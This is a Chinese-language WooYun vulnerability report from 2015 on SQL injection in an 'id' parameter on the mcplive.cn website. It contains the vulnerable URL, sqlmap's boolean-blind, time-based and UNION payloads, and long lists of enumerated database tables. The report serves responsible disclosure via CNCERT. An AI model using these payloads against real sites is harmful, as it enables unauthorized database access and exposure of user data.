当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126518

漏洞标题:微型计算机官方网站存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: jobf

提交时间:2015-07-17 13:14

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-17: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

微型计算机官方网站存在SQL注入,爆大量表段,注入点:http://www.mcplive.cn/act/ytpz/review.php?id=126

详细说明:

web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=126 AND 1884=1884
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=126 AND (SELECT * FROM (SELECT(SLEEP(5)))hlsG)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=126 UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x7468476646717a706e69,0x716b787a71),NULL,NULL,NULL--
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
Database: cniti_uc
+---------------------------------------+
| cuc_actions |
| cuc_admins |
| cuc_applications |
| cuc_badwords |
| cuc_domains |
| cuc_failedlogins |
| cuc_feeds |
| cuc_friends |
| cuc_mailqueue |
| cuc_member_record |
| cuc_member_update |
| cuc_memberbase |
| cuc_memberextra |
| cuc_memberfields |
| cuc_memberprivacy |
| cuc_members |
| cuc_mergemembers |
| cuc_msg |
| cuc_newpm |
| cuc_notelist |
| cuc_pm_indexes |
| cuc_pm_lists |
| cuc_pm_members |
| cuc_pm_messages_0 |
| cuc_pm_messages_1 |
| cuc_pm_messages_2 |
| cuc_pm_messages_3 |
| cuc_pm_messages_4 |
| cuc_pm_messages_5 |
| cuc_pm_messages_6 |
| cuc_pm_messages_7 |
| cuc_pm_messages_8 |
| cuc_pm_messages_9 |
| cuc_pms |
| cuc_protectedmembers |
| cuc_settings |
| cuc_sqlcache |
| cuc_tags |
| cuc_teams |
| cuc_vars |
+---------------------------------------+
Database: dzx31
[262 tables]
+---------------------------------------+
| dzx_common_admincp_cmenu |
| dzx_common_admincp_group |
| dzx_common_admincp_member |
| dzx_common_admincp_perm |
| dzx_common_admincp_session |
| dzx_common_admingroup |
| dzx_common_adminnote |
| dzx_common_advertisement |
| dzx_common_advertisement_custom |
| dzx_common_banned |
| dzx_common_block |
| dzx_common_block_favorite |
| dzx_common_block_item |
| dzx_common_block_item_data |
| dzx_common_block_permission |
| dzx_common_block_pic |
| dzx_common_block_style |
| dzx_common_block_xml |
| dzx_common_cache |
| dzx_common_card |
| dzx_common_card_log |
| dzx_common_card_type |
| dzx_common_connect_guest |
| dzx_common_credit_log |
| dzx_common_credit_log_field |
| dzx_common_credit_rule |
| dzx_common_credit_rule_log |
| dzx_common_credit_rule_log_field |
| dzx_common_cron |
| dzx_common_devicetoken |
| dzx_common_district |
| dzx_common_diy_data |
| dzx_common_domain |
| dzx_common_failedip |
| dzx_common_failedlogin |
| dzx_common

漏洞证明:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=126 AND 1884=1884
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=126 AND (SELECT * FROM (SELECT(SLEEP(5)))hlsG)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=126 UNION ALL SELECT NULL,NULL,CONCAT(0x716b717671,0x7468476646717a706e69,0x716b787a71),NULL,NULL,NULL--
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
Database: cniti_uc
[40 tables]
Database: dzx31
[262 tables]
+---------------------------------------+
| dzx_common_admincp_cmenu |
| dzx_common_admincp_group |
| dzx_common_admincp_member |
| dzx_common_admincp_perm |
| dzx_common_admincp_session |
| dzx_common_admingroup |
| dzx_common_adminnote |
| dzx_common_advertisement |
| dzx_common_advertisement_custom |
| dzx_common_banned |
| dzx_common_block |
| dzx_common_block_favorite |
| dzx_common_block_item |
| dzx_common_block_item_data |
| dzx_common_block_permission |
| dzx_common_block_pic |
| dzx_common_block_style |
| dzx_common_block_xml |
| dzx_common_cache |
| dzx_common_card |
| dzx_common_card_log |
| dzx_common_card_type |
| dzx_common_connect_guest |
| dzx_common_credit_log |
| dzx_common_credit_log_field |
| dzx_common_credit_rule |
| dzx_common_credit_rule_log |
| dzx_common_credit_rule_log_field |
| dzx_common_cron |
| dzx_common_devicetoken |
| dzx_common_district |
| dzx_common_diy_data |
| dzx_common_domain |
| dzx_common_failedip |
| dzx_common_failedlogin |
| dzx_common_friendlink |
| dzx_common_grouppm |
| dzx_common_invite |
| dzx_common_magic |
| dzx_common_magiclog |
| dzx_common_mailcron |
| dzx_common_mailqueue |
| dzx_common_member |
| dzx_common_member_action_log |
| dzx_common_member_connect |
| dzx_common_member_count |
| dzx_common_member_crime |
| dzx_common_member_field_forum |
| dzx_common_member_field_home |
| dzx_common_member_forum_buylog |
| dzx_common_member_grouppm |
| dzx_common_member_log |
| dzx_common_member_magic |
| dzx_common_member_medal |
| dzx_common_member_newprompt |
| dzx_common_member_profile |
| dzx_common_member_profile_setting |
| dzx_common_member_security |
| dzx_common_member_secwhite |
| dzx_common_member_stat_field |
| dzx_common_member_status |
| dzx_common_member_validate |
| dzx_common_member_verify |
| dzx_common_member_verify_info |
| dzx_common_myapp |
| dzx_common_myinvite |
| dzx_common_mytask |
| dzx_common_nav |
| dzx_common_onlinetime |
| dzx_common_optimizer |
| dzx_common_patch |
| dzx_common_plugin |
| dzx_common_pluginvar |
| dzx_common_process |
| dzx_common_regip |
| dzx_common_relatedlink |
| dzx_common_remote_port |
| dzx_common_report |
| dzx_common_searchindex |
| dzx_common_seccheck |
| dzx_common_secquestion |
| dzx_common_session |
| dzx_common_setting |
| dzx_common_smiley |
| dzx_common_sphinxcounter |
| dzx_common_stat |
| dzx_common_statuser |
| dzx_common_style |
| dzx_common_stylevar |
| dzx_common_syscache |
| dzx_common_tag |
| dzx_common_tagitem |
| dzx_common_task |
| dzx_common_taskvar |
| dzx_common_template |
| dzx_common_template_block |
| dzx_common_template_permission |
| dzx_common_uin_black |
| dzx_common_usergroup |
| dzx_common_usergroup_field |
| dzx_common_visit |
| dzx_common_word |
| dzx_common_word_type |
| dzx_connect_disktask |
| dzx_connect_feedlog |
| dzx_connect_memberbindlog |
| dzx_connect_postfeedlog |
| dzx_connect_tthreadlog |
| dzx_forum_access |
| dzx_forum_activity |
| dzx_forum_activityapply |
| dzx_forum_announcement |
| dzx_forum_attachment |
| dzx_forum_attachment_0 |
| dzx_forum_attachment_1 |
| dzx_forum_attachment_2 |
| dzx_forum_attachment_3 |
| dzx_forum_attachment_4 |
| dzx_forum_attachment_5 |
| dzx_forum_attachment_6 |
| dzx_forum_attachment_7 |
| dzx_forum_attachment_8 |
| dzx_forum_attachment_9 |
| dzx_forum_attachment_exif |
| dzx_forum_attachment_unused |
| dzx_forum_attachtype |
| dzx_forum_bbcode |
| dzx_forum_collection |
| dzx_forum_collectioncomment |
| dzx_forum_collectionfollow |
| dzx_forum_collectioninvite |
| dzx_forum_collectionrelated |
| dzx_forum_collectionteamworker |
| dzx_forum_collectionthread |
| dzx_forum_creditslog |
| dzx_forum_debate |
| dzx_forum_debatepost |
| dzx_forum_faq |
| dzx_forum_filter_post |
| dzx_forum_forum |
| dzx_forum_forum_threadtable |
| dzx_forum_forumfield

修复方案:

过滤

版权声明:转载请注明来源 jobf@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-21 14:36

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论